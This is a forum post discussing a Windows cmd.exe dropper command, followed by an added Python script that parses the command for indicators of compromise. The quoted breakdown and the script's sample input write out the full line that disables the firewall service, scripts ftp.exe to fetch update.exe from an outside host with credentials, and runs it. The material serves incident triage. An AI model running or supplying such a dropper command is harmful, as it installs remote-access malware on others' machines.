torifile
Less than Stellar Member
 
Join Date: May 2004
Location: Durham, NC
2007-04-13, 02:47

Quote:
Originally Posted by chucker
Let's analyze:
  • cmd (cmd.exe) is the command-line processor in Windows NT (in DOS / Windows 9x, this was command.com), including Windows XP and Vista. The /c argument tells it to run one specific command and then exit (rather than staying open for further user input).
  • net is a facility to manage NT services. stop sharedaccess, then, tells it to stop the service 'sharedaccess'.
  • echo, like on Unix, is a way to print out text. The following commands – open ftp.holmenhast.se 21, user ftp.holmenhast.se f1634163f, binary, get update.exe, bye – are a list of FTP commands.
  • ftp -n -v -s: then runs the FTP program, which those commands are passed on to. The commands log in to an FTP server with a specific user and download a file named update.exe.
  • Finally, net start sharedacc launches the service again.

We can deduce that this update is a replacement service to create a trojan horse, opening a Windows machine for remote access.
Nice. So how the heck did it get on my network and how did it send System Preferences this text?

And, more importantly, how can I protect myself from this happening again? Shit. I just remembered that I've got a Windows computer on the network. It's really just a print server (an old HP laserjet that just won't die). I bet it's compromised. Luckily there's nothing on it but Win2k and some music...

Ok. That Windows box is officially off the network.

If it's not red and showing substantial musculature, you're wearing it wrong.
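The breakdown chucker gives above is exactly what an incident responder does by hand: split the cmd.exe one-liner on its `&` separators, rebuild the FTP script that the `echo ... >> file` lines write out, and read the host, credentials and fetched file out of it. The following Python script is an added example that automates that triage; it is not code from the original thread or from either poster. The command line it parses is constructed from the components chucker lists (`net stop sharedaccess`, the echoed FTP commands, `ftp -n -v -s:`, `net start sharedaccess`). The script file name `i`, the `del i` cleanup and the run of `update.exe` are my additions to show how unclassified sub-commands get surfaced; the post does not show them. `sharedaccess` is the service name behind Internet Connection Sharing and, on XP SP2, the Windows Firewall, which is why a dropper stops it before pulling its payload.

```python
import json
import re

# Constructed sample input: a cmd.exe one-liner rebuilt from the components
# chucker lists. The script file name "i", the "del i" cleanup and the run of
# update.exe are my additions; the post does not show them.
CONSTRUCTED_CMDLINE = (
    "cmd /c net stop sharedaccess"
    "&echo open ftp.holmenhast.se 21>>i"
    "&echo user ftp.holmenhast.se f1634163f>>i"
    "&echo binary>>i"
    "&echo get update.exe>>i"
    "&echo bye>>i"
    "&ftp -n -v -s:i"
    "&del i"
    "&update.exe"
    "&net start sharedaccess"
)

CMD_PREFIX = re.compile(r"\s*cmd(?:\.exe)?\s+/c\s+", re.I)
# "echo <text> > file" or "echo <text> >> file": one line appended to a script file
ECHO_REDIRECT = re.compile(r"^echo\s+(.*?)\s*>>?\s*(\S+)$", re.I)
NET_SERVICE = re.compile(r"^net\s+(stop|start)\s+(\S+)", re.I)
FTP_INVOKE = re.compile(r"^ftp(?:\.exe)?\b(.*)$", re.I)


def split_commands(cmdline):
    """Drop a leading 'cmd /c' and split on cmd.exe's '&' command separator."""
    m = CMD_PREFIX.match(cmdline)
    body = cmdline[m.end():] if m else cmdline
    # '&&' yields an empty element between the two '&', which is dropped here
    return [part.strip() for part in body.split("&") if part.strip()]


def parse_ftp_script(lines):
    """Pull connection, credential and download details out of ftp.exe script lines."""
    iocs = {"host": None, "port": 21, "user": None, "password": None,
            "mode": "ascii", "files": []}
    for line in lines:
        parts = line.split()
        if not parts:
            continue
        verb = parts[0].lower()
        if verb == "open" and len(parts) >= 2:
            iocs["host"] = parts[1]
            if len(parts) >= 3 and parts[2].isdigit():
                iocs["port"] = int(parts[2])
        elif verb == "user" and len(parts) >= 2:
            # ftp -n disables auto-login, so the script supplies both values itself
            iocs["user"] = parts[1]
            iocs["password"] = parts[2] if len(parts) >= 3 else None
        elif verb in ("binary", "bin"):
            iocs["mode"] = "binary"
        elif verb == "ascii":
            iocs["mode"] = "ascii"
        elif verb in ("get", "recv", "mget") and len(parts) >= 2:
            iocs["files"].extend(parts[1:])
    return iocs


def triage(cmdline):
    """Classify each sub-command and reassemble the script that ftp -s: consumes."""
    report = {"services_stopped": [], "services_started": [],
              "ftp_flags": [], "ftp_script_file": None, "ftp_script": [],
              "other_commands": []}
    scripts = {}  # file name -> lines written to it with echo
    for cmd in split_commands(cmdline):
        m = NET_SERVICE.match(cmd)
        if m:
            key = "services_stopped" if m.group(1).lower() == "stop" else "services_started"
            report[key].append(m.group(2).lower())
            continue
        m = ECHO_REDIRECT.match(cmd)
        if m:
            scripts.setdefault(m.group(2), []).append(m.group(1))
            continue
        m = FTP_INVOKE.match(cmd)
        if m:
            # -n: no auto-login, -v: hide server replies, -s:file: read commands from file
            report["ftp_flags"] = m.group(1).split()
            for flag in report["ftp_flags"]:
                if flag.lower().startswith("-s:"):
                    report["ftp_script_file"] = flag[3:]
            continue
        report["other_commands"].append(cmd)
    report["ftp_script"] = scripts.get(report["ftp_script_file"], [])
    report["iocs"] = parse_ftp_script(report["ftp_script"])
    return report


def looks_like_ftp_dropper(report):
    """Verdict: a service is stopped, ftp.exe is scripted, and the script downloads something."""
    return bool(report["services_stopped"] and report["ftp_script_file"]
                and report["iocs"]["files"])


if __name__ == "__main__":
    print(json.dumps(triage(CONSTRUCTED_CMDLINE), indent=2))
```

Run against the constructed line, `triage` reports `sharedaccess` stopped and restarted, the script file `i`, the host `ftp.holmenhast.se:21`, the login `ftp.holmenhast.se` / `f1634163f`, binary mode, and `update.exe` as the fetched file, with `del i` and `update.exe` left in `other_commands` for a human to look at. The host, user and file name are the indicators you would block at the firewall and search for on the other machines on the same network.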